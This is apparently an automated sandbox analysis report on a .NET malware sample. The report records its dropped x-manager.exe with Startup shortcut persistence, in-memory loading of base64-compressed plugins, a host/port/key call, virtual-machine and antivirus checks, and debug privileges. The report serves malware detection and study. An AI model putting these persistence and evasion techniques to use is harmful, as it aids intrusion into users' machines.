                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
                  Source: x-manager.lnk.0.drLNK file: ..\..\..\..\..\x-manager.exe
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: x-manager.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: x-manager.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  .NET source code contains potential unpacker
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, Messages.cs.Net Code: Memory
                  Source: x-manager.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                  Source: x-manager.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                  Source: x-manager.exe.0.dr, Messages.cs.Net Code: Memory
                  Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                  Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                  Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, Messages.cs.Net Code: Memory
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile created: C:\Users\user\AppData\Roaming\x-manager.exeJump to dropped file
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x-manager.lnkJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x-manager.lnkJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeMemory allocated: 14B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeMemory allocated: 1B040000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWindow / User API: threadDelayed 5159Jump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWindow / User API: threadDelayed 4670Jump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe TID: 2536Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, 00000000.00000002.4108549552.000000001BABF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeQueries volume information: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, 00000000.00000002.4106566774.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, 00000000.00000002.4108549552.000000001BAEA000.00000004.00000020.00020000.00000000.sdmp, 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, 00000000.00000002.4108549552.000000001BA60000.00000004.00000020.00020000.00000000.sdmp, 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, 00000000.00000002.4106566774.0000000001040000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
